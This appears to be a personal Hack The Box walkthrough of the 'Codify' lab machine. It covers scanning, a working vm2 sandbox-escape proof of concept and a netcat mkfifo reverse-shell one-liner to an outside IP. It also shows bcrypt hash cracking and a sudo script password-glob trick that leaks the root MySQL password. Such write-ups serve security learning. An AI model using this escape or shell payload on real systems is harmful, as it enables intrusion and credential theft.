hello hacker just wanted to share with you a simple walkthrough from hack the box seasonal III active machine.

Description

OS:LINUX
MACHINE_NAME:CODIFY
REALED_DATE: 4/11/2023
PWN_DATE: 5/11/2023
RATE:EASY
AUTHORY:kavigihan 

codify is simple easy machine from HTB seasonal III which is found running a node.js editor which is made of vm2 and which is vulnerable to remote code execution.

Here is how i solved the box.

SCANNING

# Nmap 7.94SVN scan initiated Tue Apr  2 13:30:01 2024 as: nmap -sC -sV -oN nmap_scan.txt -vvv -p 53,22,80 10.10.11.239
Nmap scan report for 10.10.11.239
Host is up, received syn-ack (0.20s latency).
Scanned at 2024-04-02 13:30:02 EDT for 29s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
|   256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
53/tcp open  domain  syn-ack (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp open  http    syn-ack Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://codify.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94SVN%I=7%D=4/2%Time=660C40A5%P=x86_64-pc-linux-gnu%r(DN
SF:SVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x82\0\x01\0\0\0\0\0\0\x07versio
SF:n\x04bind\0\0\x10\0\x03");
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  2 13:30:31 2024 -- 1 IP address (1 host up) scanned in 30.02 seconds

nmap reviel two sensitive port (port 22 and 80).From

ENUMERATION

From nmap we can see that we have 2 ports open where by port 22 we don't have credentials to login with, but port 80 is a web service running but also we can see we that it has domain.

domain: codify.htb (i added it to /etc/hosts)

From here we can see that it is running a node.js if you click (Try it now) I found a node.js text editor since we didn't have much information about the node.js we can decided to check other functionalities.

It seems child_process is restricted but also fs that one was awersome. Check this one out if child_process & fs was maybe enabled it was a very very easy to get a rce from the text editor.

Upon moving found this interested text on the About Us page.

vm2(virtual machine 2) is a library that provides a secure and sandboxed environment for executing JavaScript code, primarily used in server-side environments such as Node. js.

if you view the source code you will find the it is v3.9.16

From here I have already know with what am dealing so far my another step was to google for CVE if is available

And i found this PoC how to exploit it PoC

EXPLOITATION

## PoC

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd');
}
`

console.log(vm.run(code));

getting a reverse shell as svc

time for a reverse shell just replace the IP with yours and your fav port number and remember to start a listener on your terminal

payload: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 1234 >/tmp/f

And i got a shell on my terminal

FOOTHOLDING

Since I got a reverse shell I stibilized it like a pro and moved on to my next phase

From here now we have many options such uploading linpeas or pspy64 and let them help us do some more analysis with our target. But i just go straight.

We can now try to check the number of user with shells so that we can know what were dealing with inside this server

users with shells are

svc:x:1001:1001:,,,:/home/svc:/bin/bash
joshua:x:1000:1000:,,,:/home/joshua:/bin/bash
root:x:0:0:root:/root:/bin/bash

NOTE: all this information we can also get from linpeas it good in finding users details and common bugs.

Normally my next stop was to try to check in the /var/www directory and see if I can find any juice information.

As we see in the contacts we find a tickets.db file which inside it we can see some username and password hash

username:joshua
password:$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2

cracking the joshua hash

The hash type is browfish and its mode is 3200 so we can use hashcat or john to do this simple as that, i have already cracked the hash

┌──(alienx㉿alienX)-[~/Desktop/MACHINES/CODIFY]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt --show
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2:spongebob1

ssh credentials

username:joshua
password:spongebob1

Time now to login to the server as user joshua with our creds

PRIVILEGE ESCALATION

With privilege escalation, first of all i usually try to check for the vulnerable kernels but to be frankly open only this technique of me only works for 80% tryhackme and PwnTillDown machines(thats y i slowdown even doing them coz it even works for insane and hard machines,many of them are vulnelable to kernel so i usually find my self easy to root dispite is no the right way to do the machine)

Oky this machine was not even vulnerable to kernel exploit.

checking sudo -l

Since my first approach didn't work i moved on with "sudo -l" and will work as long as you have password for joshua

Now we can see that user joshua may run mysql-backup.sh script as root

[sudo] password for joshua: 
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh

We can do more analysis about script lets give it a visit from its location a little bit and see what it has fun there.

#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'

In order to get root access we have to understand the script first

About the script

Its a bash script writen in bash, it begin by initilizing the DB_USER as 'root',after that the script then initilize the DB_PASS with a location which is located in root directory, but also the script set the path where the mysql BACKUP should be created.

After that the script then prompt the user the password and then compare it with the one present in the /root/.creds when password matches it display "Password confirmed!" and proceed to the next phase where it tried to create mysql backup and then unzip it and send it to the "BACKUP_DIR/db.sql.gz" as a ziped file.

That was a litle simple overview of the script but the script does a bunch of stuffs so on your own time just give. forexample with the scipt it is possible to list the databases with an invalid DB_PASS os take your time and read the script well.

How to exploit the script

From the script when it reads the user pass it doesn't provide any filtering and with linux is that it possible to execute something else that provides the same properties.

Now create another session with user joshua and from the first session upload pspy64 binary

N/B: pspy64 is good in analysing what is going on with every interesting process on the computer

While pspy64 was running on the second session i decided to try running the script with sudo

joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root: *

I tried with password as '*' and Boom i got juice info

From the second session If we take a close look we will find something like this

2024/04/02 21:39:06 CMD: UID=0    PID=51706  | /usr/bin/mysql -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 -e SHOW DATABASES; 
2024/04/02 21:39:06 CMD: UID=0    PID=51705  | /bin/bash /opt/scripts/mysql-backup.sh 
2024/04/02 21:39:06 CMD: UID=0    PID=51709  | 
2024/04/02 21:39:06 CMD: UID=0    PID=51710  | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql

Now from here we can see that it is trying to run mysql with user 'root' and password as 'kljh12k3jhaskjh12kjh3', since the backup was successful created means that password was this one which was required.

The machine was really interesting and what I love from HTB is that i usually learn something new every pentesting I do, We are almost done with SEASONAL IV (savage land) current its fun and tough here this seasonal with windows machines